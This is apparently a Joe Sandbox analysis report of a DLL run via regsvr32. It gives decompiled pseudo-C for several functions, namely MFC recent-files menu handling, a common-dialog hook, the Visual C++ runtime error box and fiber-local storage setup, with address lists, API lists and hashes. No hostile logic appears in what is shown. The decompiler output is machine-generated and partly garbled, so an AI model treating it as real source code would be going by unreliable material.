					__eflags =  *(_t183 - 0xc);
					if( *(_t183 - 0xc) != 0) {
						__eflags =  *(_t224 + 0xc);
						if( *(_t224 + 0xc) != 0) {
							_t173 = 0;
							__eflags =  *(_t220 + 4);
							if( *(_t220 + 4) > 0) {
								do {
									DeleteMenu( *( *(_t224 + 0xc) + 4),  *(_t224 + 4) + _t173, 0);
									_t173 = _t173 + 1;
									__eflags = _t173 -  *(_t220 + 4);
								} while (_t173 <  *(_t220 + 4));
							}
							_t110 = GetCurrentDirectoryA(0x104,  &_v292);
							__eflags = _t110;
							if(_t110 != 0) {
								__eflags = _t110 - 0x104;
								if(_t110 < 0x104) {
									_t175 = lstrlenA( &_v292);
									 *((char*)(_t228 + _t175 - 0x120)) = 0x5c;
									_t176 = _t175 + 1;
									_v308 = _t176;
									 *((char*)(_t228 + _t176 - 0x120)) = 0;
									_v300 =  *((intOrPtr*)( *((intOrPtr*)(E100243B2())) + 0xc))() + 0x10;
									_v8 = _v8 & 0x00000000;
									_t118 = E100243B2();
									_t216 =  *_t118;
									_v296 =  *((intOrPtr*)( *_t118 + 0xc))() + 0x10;
									_a4 = _a4 & 0x00000000;
									__eflags =  *(_t220 + 4);
									_v8 = 1;
									if( *(_t220 + 4) > 0) {
										while(1) {
											_t125 =  *((intOrPtr*)( *_t220 + 8))( &_v300, _a4,  &_v292, _t176, 1);
											__eflags = _t125;
											if(_t125 == 0) {
												goto L40;
											}
											_t177 = _v300;
											_t128 = E100017D0( &_v296,  *((intOrPtr*)(_t177 - 0xc)) +  *((intOrPtr*)(_t177 - 0xc)));
											while(1) {
												_t196 =  *_t177;
												__eflags = _t196;
												if(_t196 == 0) {
													break;
												}
												__eflags = _t196 - 0x26;
												if(_t196 == 0x26) {
													 *_t128 = _t196;
													_t128 = _t128 + 1;
													__eflags = _t128;
												}
												_t197 =  *_t177;
												_t217 = _t197 & 0x000000ff;
												__eflags =  *(_t217 + 0x10050a81) & 0x00000004;
												if(( *(_t217 + 0x10050a81) & 0x00000004) != 0) {
													 *_t128 = _t197;
													_t128 = _t128 + 1;
													_t177 = _t177 + 1;
													__eflags = _t177;
												}
												 *_t128 =  *_t177;
												_t128 = _t128 + 1;
												_t177 = _t177 + 1;
												__eflags = _t177;
											}
											 *_t128 = _t196;
											E10006CE2(_t177,  &_v296, _t220, 0xffffffff);
											_t132 =  *((intOrPtr*)(_t220 + 0x14)) + _a4 + 0x00000001 & 0x0000000f;
											__eflags = _t132 - 0xa;
											if(__eflags <= 0) {
												if(__eflags != 0) {
													wsprintfA( &_v32, ??, "&%d ", _t132);
													goto L38;
												} else {
													lstrcpyA( &_v32, "1&0 ");
												}
											} else {
												wsprintfA( &_v32, ??, "%d ", _t132);
												L38:
												_t230 = _t230 + 0xc;
											}
											_push( &_v32);
											_t136 = E10006B11( &_v312, __eflags);
											_push( &_v296);
											_push(_t136);
											_push( &_v316);
											_v8 = 2;
											_t138 = E10024DC7( &_v296, __eflags);
											_t216 =  *(_t224 + 8);
											_t203 =  *(_t224 + 4);
											_t77 = _t216 + 1; // 0x1
											 *(_t224 + 8) = _t77;
											_t79 = _t203 + 1; // 0x3
											_t230 = _t230 + 0xc;
											 *(_t224 + 4) = _t79;
											_v304 =  *_t138;
											InsertMenuA( *( *(_t224 + 0xc) + 4),  *(_t224 + 8), 0x400,  *(_t224 + 4), _v304);
											E100014B0(_v316 + 0xfffffff0,  *(_t224 + 8));
											_v8 = 1;
											E100014B0(_v312 + 0xfffffff0,  *(_t224 + 8));
											_a4 = _a4 + 1;
											__eflags = _a4 -  *(_t220 + 4);
											if(_a4 <  *(_t220 + 4)) {
												_t176 = _v308;
												continue;
											}
											goto L40;
										}
									}
									L40:
									 *(_t224 + 8) =  *(_t224 + 8) - 1;
									 *((intOrPtr*)(_t224 + 0x20)) = GetMenuItemCount( *( *(_t224 + 0xc) + 4));
									 *((intOrPtr*)(_t224 + 0x18)) = 1;
									E100014B0(_v296 + 0xfffffff0, _t216);
									__eflags = _v300 + 0xfffffff0;
									_t110 = E100014B0(_v300 + 0xfffffff0, _t216);
								}
							}
						}
					} else {
						_t180 =  *_t171;
						__eflags =  *(_t180 - 0xc);
						if( *(_t180 - 0xc) != 0) {
							 *((intOrPtr*)( *_t224 + 0xc))(_t180);
						}
						_t110 =  *((intOrPtr*)( *_t224))(0);
					}
					 *[fs:0x0] = _v16;
					return E100117AE(_t110, _v20);
				} else {
					_push(_a4);
					_push( &_v268);
					if(E1002592C(__ebx, _t219, __esi) == 0) {
						goto L10;
					} else {
						_t226 = 0;
						if( *((intOrPtr*)(_t219 + 4)) - 1 > 0) {
							while(E1002535C(_t170, _t219, _t226,  *((intOrPtr*)( *((intOrPtr*)(_t219 + 8)) + _t226 * 4)),  &_v268) == 0) {
								_t226 = _t226 + 1;
								if(_t226 <  *((intOrPtr*)(_t219 + 4)) - 1) {
									continue;
								} else {
								}
								L8:
								while(_t226 > 0) {
									E100074A5(_t170,  *((intOrPtr*)(_t219 + 8)) + _t226 * 4, _t228,  *((intOrPtr*)(_t219 + 8)) + _t226 * 4 - 4);
									_t226 = _t226 - 1;
									__eflags = _t226;
								}
								goto L9;
							}
							goto L8;
						}
						L9:
						return E100117AE(E10006AEC( *((intOrPtr*)(_t219 + 8)),  &_v268), _v8);
					}
				}
			}















































                                                                                                            0x10024fbb
                                                                                                            0x10024fbb
                                                                                                            0x10024fbb
                                                                                                            0x10024fc8
                                                                                                            0x10024fcd
                                                                                                            0x10024fce
                                                                                                            0x10024fcf
                                                                                                            0x10024fd2
                                                                                                            0x10024fd4
                                                                                                            0x1002505a
                                                                                                            0x1002505a
                                                                                                            0x1002505c
                                                                                                            0x1002505e
                                                                                                            0x10025060
                                                                                                            0x10025065
                                                                                                            0x1002506b
                                                                                                            0x10025070
                                                                                                            0x10025076
                                                                                                            0x1002507b
                                                                                                            0x1002507c
                                                                                                            0x1002507d
                                                                                                            0x10025080
                                                                                                            0x10025081
                                                                                                            0x10025083
                                                                                                            0x10025086
                                                                                                            0x10025089
                                                                                                            0x1002508e
                                                                                                            0x10025091
                                                                                                            0x10025093
                                                                                                            0x10025095
                                                                                                            0x10025097
                                                                                                            0x1002509e
                                                                                                            0x1002509e
                                                                                                            0x10025097
                                                                                                            0x100250a6
                                                                                                            0x100250a8
                                                                                                            0x100250aa
                                                                                                            0x100250ad
                                                                                                            0x100250cb
                                                                                                            0x100250ce
                                                                                                            0x100250d4
                                                                                                            0x100250d6
                                                                                                            0x100250d9
                                                                                                            0x100250db
                                                                                                            0x100250e9
                                                                                                            0x100250ef
                                                                                                            0x100250f0
                                                                                                            0x100250f0
                                                                                                            0x100250db
                                                                                                            0x10025102
                                                                                                            0x10025108
                                                                                                            0x1002510a
                                                                                                            0x10025110
                                                                                                            0x10025112
                                                                                                            0x10025125
                                                                                                            0x10025127
                                                                                                            0x1002512f
                                                                                                            0x10025130
                                                                                                            0x10025136
                                                                                                            0x1002514d
                                                                                                            0x10025153
                                                                                                            0x10025157
                                                                                                            0x1002515c
                                                                                                            0x10025166
                                                                                                            0x1002516c
                                                                                                            0x10025170
                                                                                                            0x10025174
                                                                                                            0x10025178
                                                                                                            0x10025186
                                                                                                            0x1002519e
                                                                                                            0x100251a1
                                                                                                            0x100251a3
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100251a9
                                                                                                            0x100251bb
                                                                                                            0x100251e2
                                                                                                            0x100251e2
                                                                                                            0x100251e4
                                                                                                            0x100251e6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100251c2
                                                                                                            0x100251c5
                                                                                                            0x100251c7
                                                                                                            0x100251c9
                                                                                                            0x100251c9
                                                                                                            0x100251c9
                                                                                                            0x100251ca
                                                                                                            0x100251cc
                                                                                                            0x100251cf
                                                                                                            0x100251d6
                                                                                                            0x100251d8
                                                                                                            0x100251da
                                                                                                            0x100251db
                                                                                                            0x100251db
                                                                                                            0x100251db
                                                                                                            0x100251de
                                                                                                            0x100251e0
                                                                                                            0x100251e1
                                                                                                            0x100251e1
                                                                                                            0x100251e1
                                                                                                            0x100251e8
                                                                                                            0x100251f2
                                                                                                            0x10025201
                                                                                                            0x10025204
                                                                                                            0x10025207
                                                                                                            0x10025211
                                                                                                            0x1002522e
                                                                                                            0x00000000
                                                                                                            0x10025213
                                                                                                            0x1002521c
                                                                                                            0x1002521c
                                                                                                            0x10025209
                                                                                                            0x1002522e
                                                                                                            0x1002522a
                                                                                                            0x10025234
                                                                                                            0x10025234
                                                                                                            0x1002523a
                                                                                                            0x10025241
                                                                                                            0x1002524c
                                                                                                            0x1002524d
                                                                                                            0x10025254
                                                                                                            0x10025255
                                                                                                            0x10025259
                                                                                                            0x1002525e
                                                                                                            0x10025261
                                                                                                            0x10025264
                                                                                                            0x10025267
                                                                                                            0x1002526a
                                                                                                            0x1002526d
                                                                                                            0x10025270
                                                                                                            0x10025275
                                                                                                            0x1002528e
                                                                                                            0x1002529d
                                                                                                            0x100252ab
                                                                                                            0x100252af
                                                                                                            0x100252b4
                                                                                                            0x100252ba
                                                                                                            0x100252bd
                                                                                                            0x10025180
                                                                                                            0x00000000
                                                                                                            0x10025180
                                                                                                            0x00000000
                                                                                                            0x100252bd
                                                                                                            0x10025186
                                                                                                            0x100252c3
                                                                                                            0x100252c6
                                                                                                            0x100252db
                                                                                                            0x100252de
                                                                                                            0x100252e5
                                                                                                            0x100252f0
                                                                                                            0x100252f3
                                                                                                            0x100252f3
                                                                                                            0x10025112
                                                                                                            0x1002510a
                                                                                                            0x100250af
                                                                                                            0x100250af
                                                                                                            0x100250b1
                                                                                                            0x100250b4
                                                                                                            0x100250bb
                                                                                                            0x100250bb
                                                                                                            0x100250c4
                                                                                                            0x100250c4
                                                                                                            0x100252fd
                                                                                                            0x1002530e
                                                                                                            0x10024fea
                                                                                                            0x10024fea
                                                                                                            0x10024ff3
                                                                                                            0x10024ffb
                                                                                                            0x00000000
                                                                                                            0x10024ffd
                                                                                                            0x10025000
                                                                                                            0x10025005
                                                                                                            0x10025007
                                                                                                            0x10025021
                                                                                                            0x10025025
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10025027
                                                                                                            0x00000000
                                                                                                            0x10025039
                                                                                                            0x10025033
                                                                                                            0x10025038
                                                                                                            0x10025038
                                                                                                            0x10025038
                                                                                                            0x00000000
                                                                                                            0x10025039
                                                                                                            0x00000000
                                                                                                            0x10025007
                                                                                                            0x1002503d
                                                                                                            0x10025057
                                                                                                            0x10025057
                                                                                                            0x10024ffb

                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 10024FDD
                                                                                                            • __EH_prolog.LIBCMT ref: 1002506B
                                                                                                            • DeleteMenu.USER32(?,?,00000000), ref: 100250E9
                                                                                                            • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 10025102
                                                                                                            • lstrlenA.KERNEL32(?), ref: 1002511F
                                                                                                            • wsprintfA.USER32 ref: 1002522E
                                                                                                              • Part of subcall function 1002592C: __EH_prolog.LIBCMT ref: 10025931
                                                                                                              • Part of subcall function 1002592C: GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 1002595B
                                                                                                              • Part of subcall function 1002592C: lstrcpynA.KERNEL32(?,?,00000104), ref: 1002596C
                                                                                                            • lstrcpyA.KERNEL32(?,1&0 ,000000FF,?), ref: 1002521C
                                                                                                            • InsertMenuA.USER32(00000002,00000000,00000400,00000002,?), ref: 1002528E
                                                                                                            • GetMenuItemCount.USER32 ref: 100252CC
                                                                                                              • Part of subcall function 1002535C: lstrcmpiA.KERNEL32(?,00000000), ref: 10025375
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Menu$H_prologlstrlen$CountCurrentDeleteDirectoryFullInsertItemNamePathlstrcmpilstrcpylstrcpynwsprintf
                                                                                                            • String ID: %d $&%d $1&0 $\
                                                                                                            • API String ID: 342826643-2399880791
                                                                                                            • Opcode ID: e1eed6eaa5f1d35012eb48c82aef279fa05277b41a2bb3cefb7989940d9464f9
                                                                                                            • Instruction ID: 8aad9e791dd0b61d4e6d294f68b120ef5cdd25e9988c916dda0b03ab33557493
                                                                                                            • Opcode Fuzzy Hash: e1eed6eaa5f1d35012eb48c82aef279fa05277b41a2bb3cefb7989940d9464f9
                                                                                                            • Instruction Fuzzy Hash: 31B1BD34900215DFDB10CF64DC84FAAB7B4FF09345F508699E59A8B292DB31EA84CF94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001D28C Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 123registryclipboardCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 92%
                                                                                                            			E1001D28C(struct HWND__* _a4, intOrPtr _a8, short _a12, signed int _a16) {
				void* __ebp;
				signed int _t31;
				signed int _t33;
				void* _t40;
				int _t46;
				intOrPtr _t64;
				signed int* _t65;
				void* _t67;
				intOrPtr* _t69;

				if(_a4 != 0) {
					_push(0x100347fd);
					_t53 = 0x1004efe8;
					_t67 = E10037855(0x1004efe8);
					__eflags =  *(_t67 + 0x18);
					if( *(_t67 + 0x18) != 0) {
						_push(_a4);
						__eflags = E10022115();
						if(__eflags == 0) {
							_t53 =  *(_t67 + 0x18);
							E10022DAA( *(_t67 + 0x18), __eflags, _a4);
							 *(_t67 + 0x18) = 0;
						}
					}
					_t64 = _a8;
					__eflags = _t64 - 0x110;
					if(_t64 != 0x110) {
						__eflags = _t64 -  *0x1004f3b8; // 0x0
						if(__eflags == 0) {
							L22:
							SendMessageA(_a4, 0x111, 0xe146, 0);
							_t31 = 1;
							__eflags = 1;
							goto L23;
						}
						__eflags = _t64 - 0x111;
						if(_t64 != 0x111) {
							L10:
							__eflags = _t64 - 0xc000;
							if(_t64 >= 0xc000) {
								_push(_a4);
								_t69 = E10022115();
								_t33 = E100244DE(_t69, 0x10040f58);
								__eflags = _t33;
								if(_t33 == 0) {
									L14:
									__eflags = _t64 -  *0x1004f3ac; // 0x0
									if(__eflags != 0) {
										__eflags = _t64 -  *0x1004f3b0; // 0x0
										if(__eflags != 0) {
											__eflags = _t64 -  *0x1004f3a8; // 0x0
											if(__eflags != 0) {
												__eflags = _t64 -  *0x1004f3b4; // 0x0
												if(__eflags != 0) {
													goto L11;
												}
												_t31 =  *((intOrPtr*)( *_t69 + 0x158))();
												goto L23;
											}
											 *((intOrPtr*)( *_t69 + 0x160))(_a12, _a16 & 0x0000ffff, _a16 >> 0x10);
											goto L11;
										}
										_t19 = _t69 + 0x1c0; // 0x1c0
										_t65 = _t19;
										 *_t65 = _a16;
										_t31 =  *((intOrPtr*)( *_t69 + 0x15c))();
										 *_t65 =  *_t65 & 0x00000000;
										goto L23;
									}
									_t31 =  *((intOrPtr*)( *_t69 + 0x158))(_a16);
									goto L23;
								}
								_t40 = E1001CE89(_t69);
								__eflags =  *(_t40 + 0x36) & 0x00000008;
								if(( *(_t40 + 0x36) & 0x00000008) != 0) {
									goto L11;
								}
								goto L14;
							}
							L11:
							_t31 = 0;
							goto L23;
						}
						__eflags = _a12 - 0x40e;
						if(_a12 == 0x40e) {
							goto L22;
						}
						goto L10;
					} else {
						 *0x1004f3a8 = RegisterClipboardFormatA("commdlg_LBSelChangedNotify");
						 *0x1004f3ac = RegisterClipboardFormatA("commdlg_ShareViolation");
						 *0x1004f3b0 = RegisterClipboardFormatA("commdlg_FileNameOK");
						 *0x1004f3b4 = RegisterClipboardFormatA("commdlg_ColorOK");
						 *0x1004f3b8 = RegisterClipboardFormatA("commdlg_help");
						_t46 = RegisterClipboardFormatA("commdlg_SetRGBColor");
						_push(_a16);
						 *0x1004f3bc = _t46;
						_push(_a12);
						_t31 = E1001EB68(_t53, _a4, 0x110);
						L23:
						return _t31;
					}
				}
				return 0;
			}












                                                                                                            0x1001d295
                                                                                                            0x1001d29f
                                                                                                            0x1001d2a4
                                                                                                            0x1001d2ae
                                                                                                            0x1001d2b0
                                                                                                            0x1001d2b3
                                                                                                            0x1001d2b5
                                                                                                            0x1001d2bd
                                                                                                            0x1001d2bf
                                                                                                            0x1001d2c4
                                                                                                            0x1001d2c7
                                                                                                            0x1001d2cc
                                                                                                            0x1001d2cc
                                                                                                            0x1001d2bf
                                                                                                            0x1001d2cf
                                                                                                            0x1001d2d8
                                                                                                            0x1001d2da
                                                                                                            0x1001d33e
                                                                                                            0x1001d349
                                                                                                            0x1001d40c
                                                                                                            0x1001d417
                                                                                                            0x1001d41f
                                                                                                            0x1001d41f
                                                                                                            0x00000000
                                                                                                            0x1001d41f
                                                                                                            0x1001d34f
                                                                                                            0x1001d351
                                                                                                            0x1001d35f
                                                                                                            0x1001d35f
                                                                                                            0x1001d365
                                                                                                            0x1001d36e
                                                                                                            0x1001d376
                                                                                                            0x1001d37f
                                                                                                            0x1001d384
                                                                                                            0x1001d386
                                                                                                            0x1001d395
                                                                                                            0x1001d395
                                                                                                            0x1001d39b
                                                                                                            0x1001d3ac
                                                                                                            0x1001d3b2
                                                                                                            0x1001d3ce
                                                                                                            0x1001d3d4
                                                                                                            0x1001d3f4
                                                                                                            0x1001d3fa
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001d404
                                                                                                            0x00000000
                                                                                                            0x1001d404
                                                                                                            0x1001d3e9
                                                                                                            0x00000000
                                                                                                            0x1001d3e9
                                                                                                            0x1001d3b7
                                                                                                            0x1001d3b7
                                                                                                            0x1001d3bd
                                                                                                            0x1001d3c3
                                                                                                            0x1001d3c9
                                                                                                            0x00000000
                                                                                                            0x1001d3c9
                                                                                                            0x1001d3a4
                                                                                                            0x00000000
                                                                                                            0x1001d3a4
                                                                                                            0x1001d38a
                                                                                                            0x1001d38f
                                                                                                            0x1001d393
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001d393
                                                                                                            0x1001d367
                                                                                                            0x1001d367
                                                                                                            0x00000000
                                                                                                            0x1001d367
                                                                                                            0x1001d353
                                                                                                            0x1001d359
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001d2dc
                                                                                                            0x1001d2ee
                                                                                                            0x1001d2fa
                                                                                                            0x1001d306
                                                                                                            0x1001d312
                                                                                                            0x1001d31e
                                                                                                            0x1001d323
                                                                                                            0x1001d325
                                                                                                            0x1001d328
                                                                                                            0x1001d32d
                                                                                                            0x1001d334
                                                                                                            0x1001d420
                                                                                                            0x00000000
                                                                                                            0x1001d421
                                                                                                            0x1001d2da
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • RegisterClipboardFormatA.USER32 ref: 1001D2E7
                                                                                                            • RegisterClipboardFormatA.USER32 ref: 1001D2F3
                                                                                                            • RegisterClipboardFormatA.USER32 ref: 1001D2FF
                                                                                                            • RegisterClipboardFormatA.USER32 ref: 1001D30B
                                                                                                            • RegisterClipboardFormatA.USER32 ref: 1001D317
                                                                                                            • RegisterClipboardFormatA.USER32 ref: 1001D323
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClipboardFormatRegister
                                                                                                            • String ID: commdlg_ColorOK$commdlg_FileNameOK$commdlg_LBSelChangedNotify$commdlg_SetRGBColor$commdlg_ShareViolation$commdlg_help
                                                                                                            • API String ID: 1228543026-3888057576
                                                                                                            • Opcode ID: 26a9f27f9cc4385a7a007a1bb79a9b34ea0bc551609e4be67ab91c335422c716
                                                                                                            • Instruction ID: 90b801e29acbd5a70dd584596d4e007027562c874008bfc0544b1ea411f40a0f
                                                                                                            • Opcode Fuzzy Hash: 26a9f27f9cc4385a7a007a1bb79a9b34ea0bc551609e4be67ab91c335422c716
                                                                                                            • Instruction Fuzzy Hash: E7418071A00265EFDB21FF25CC889AE3BE1EB44391B12442AF905DB251DB30EA91CB95
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10016994 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 115fileCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 71%
                                                                                                            			E10016994() {
				intOrPtr _t20;
				int _t21;
				long _t24;
				void* _t31;
				void* _t51;
				long _t52;
				void* _t57;
				signed int _t67;
				void** _t69;
				void* _t70;
				void* _t72;
				void* _t73;

				_t70 = _t72 - 0x8c;
				_t73 = _t72 - 0x10c;
				_t20 =  *0x1004c470; // 0xf3933a06
				_t52 =  *(_t70 + 0x94);
				 *((intOrPtr*)(_t70 + 0x88)) = _t20;
				_t21 = 0;
				while(_t52 !=  *((intOrPtr*)(0x1004cb88 + _t21 * 8))) {
					_t21 = _t21 + 1;
					if(_t21 < 0x13) {
						continue;
					}
					break;
				}
				_t67 = _t21 << 3;
				_t6 = _t67 + 0x1004cb88; // 0x28000000
				if(_t52 ==  *_t6) {
					_t21 =  *0x1004f3d4; // 0x0
					if(_t21 == 1 || _t21 == 0 &&  *0x1004f3d8 == 1) {
						_t17 = _t67 + 0x1004cb8c; // 0x10042328
						_t69 = _t17;
						_t24 = E10011820( *_t69);
						_t21 = WriteFile(GetStdHandle(0xfffffff4),  *_t69, _t24, _t70 + 0x94, 0);
					} else {
						if(_t52 != 0xfc) {
							 *((char*)(_t70 + 0x84)) = 0;
							if(GetModuleFileNameA(0, _t70 - 0x80, 0x104) == 0) {
								E10017B90(_t70 - 0x80, "<program name unknown>");
							}
							_t63 = _t70 - 0x80;
							if(E10011820(_t70 - 0x80) + 1 > 0x3c) {
								E10019E20(E10011820(_t63) + _t70 - 0x45, "...", 3);
								_t73 = _t73 + 0x10;
							}
							_t31 = E10011820(_t63);
							_t12 = _t67 + 0x1004cb8c; // 0x10042328
							_t14 = E10011820( *_t12) + 0x1c; // 0x1c
							_pop(_t57);
							E10010B20(_t31 + _t14 + 0x00000003 & 0xfffffffc, _t57);
							_t51 = _t73;
							E10017B90(_t51, "Runtime Error!\n\nProgram: ");
							E10017BA0(_t51, _t63);
							E10017BA0(_t51, "\n\n");
							_t15 = _t67 + 0x1004cb8c; // 0x10042328
							E10017BA0(_t51,  *_t15);
							_push(0x12010);
							_push("Microsoft Visual C++ Runtime Library");
							_push(_t51);
							_t21 = E10019D1D();
						}
					}
				}
				return E100117AE(_t21,  *((intOrPtr*)(_t70 + 0x88)));
			}















                                                                                                            0x10016995
                                                                                                            0x1001699c
                                                                                                            0x100169a2
                                                                                                            0x100169a7
                                                                                                            0x100169af
                                                                                                            0x100169b8
                                                                                                            0x100169ba
                                                                                                            0x100169c3
                                                                                                            0x100169c7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100169c7
                                                                                                            0x100169cb
                                                                                                            0x100169ce
                                                                                                            0x100169d4
                                                                                                            0x100169da
                                                                                                            0x100169e2
                                                                                                            0x10016acf
                                                                                                            0x10016acf
                                                                                                            0x10016ad7
                                                                                                            0x10016ae9
                                                                                                            0x100169f9
                                                                                                            0x100169ff
                                                                                                            0x10016a0f
                                                                                                            0x10016a1d
                                                                                                            0x10016a28
                                                                                                            0x10016a2e
                                                                                                            0x10016a2f
                                                                                                            0x10016a3f
                                                                                                            0x10016a5b
                                                                                                            0x10016a60
                                                                                                            0x10016a60
                                                                                                            0x10016a64
                                                                                                            0x10016a69
                                                                                                            0x10016a76
                                                                                                            0x10016a7e
                                                                                                            0x10016a82
                                                                                                            0x10016a87
                                                                                                            0x10016a8f
                                                                                                            0x10016a96
                                                                                                            0x10016aa1
                                                                                                            0x10016aa6
                                                                                                            0x10016aad
                                                                                                            0x10016ab2
                                                                                                            0x10016ab7
                                                                                                            0x10016abc
                                                                                                            0x10016abd
                                                                                                            0x10016ac2
                                                                                                            0x100169ff
                                                                                                            0x100169e2
                                                                                                            0x10016b0a

                                                                                                            APIs
                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 10016A15
                                                                                                            • _strlen.LIBCMT ref: 10016A35
                                                                                                            • _strlen.LIBCMT ref: 10016A44
                                                                                                            • _strncpy.LIBCMT ref: 10016A5B
                                                                                                            • _strlen.LIBCMT ref: 10016A64
                                                                                                            • _strlen.LIBCMT ref: 10016A71
                                                                                                            • _strlen.LIBCMT ref: 10016AD7
                                                                                                            • GetStdHandle.KERNEL32(000000F4,10042328,00000000,?,00000000,00000000,00000000,00000000), ref: 10016AE2
                                                                                                            • WriteFile.KERNEL32(00000000), ref: 10016AE9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _strlen$File$HandleModuleNameWrite_strncpy
                                                                                                            • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                            • API String ID: 190417973-4022980321
                                                                                                            • Opcode ID: d9df06dfbccc529ba4e4772b6333d36022795db3091ded2d1c9dd1f49d36b4f7
                                                                                                            • Instruction ID: a98b9a16bc0a3033c6b9ef3d9cc886c10ccef6c9644ec2f046cd71b0d49ba214
                                                                                                            • Opcode Fuzzy Hash: d9df06dfbccc529ba4e4772b6333d36022795db3091ded2d1c9dd1f49d36b4f7
                                                                                                            • Instruction Fuzzy Hash: 6331F4765002146BEB21EB74CCD6EAA37BDEF48250F10891AF545EB142EF34F9C98B64
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10015384 Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 71libraryloadermemoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 70%
                                                                                                            			E10015384() {
				void* __edi;
				void* __esi;
				intOrPtr _t7;
				struct HINSTANCE__* _t9;
				struct HINSTANCE__* _t11;
				long _t12;
				_Unknown_base(*)()* _t16;
				void* _t22;
				struct HINSTANCE__* _t26;
				void* _t30;
				struct HINSTANCE__* _t32;

				if(E100138E5() != 0) {
					_push(_t30);
					_t26 = GetModuleHandleA("kernel32.dll");
					__eflags = _t26;
					if(_t26 != 0) {
						_t30 = GetProcAddress;
						 *0x1004f5dc = GetProcAddress(_t26, "FlsAlloc");
						 *0x1004f5e0 = GetProcAddress(_t26, "FlsGetValue");
						 *0x1004f5e4 = GetProcAddress(_t26, "FlsSetValue");
						_t16 = GetProcAddress(_t26, "FlsFree");
						__eflags =  *0x1004f5e0;
						 *0x1004f5e8 = _t16;
						if( *0x1004f5e0 == 0) {
							 *0x1004f5e0 = TlsGetValue;
							 *0x1004f5e4 = TlsSetValue;
							 *0x1004f5dc = 0x10015164;
							 *0x1004f5e8 = TlsFree;
						}
					}
					_t7 =  *0x1004f5dc(E1001520E);
					__eflags = _t7 - 0xffffffff;
					 *0x1004c848 = _t7;
					if(__eflags == 0) {
						L9:
						E1001516D();
						_t9 = 0;
						__eflags = 0;
					} else {
						_push(0x8c);
						_push(1);
						_t32 = E1001382A(_t22, 1, _t30, __eflags);
						__eflags = _t32;
						if(_t32 == 0) {
							goto L9;
						} else {
							_t11 =  *0x1004f5e4( *0x1004c848, _t32);
							__eflags = _t11;
							if(_t11 == 0) {
								goto L9;
							} else {
								 *((intOrPtr*)(_t32 + 0x54)) = 0x1004cb00;
								 *((intOrPtr*)(_t32 + 0x14)) = 1;
								_t12 = GetCurrentThreadId();
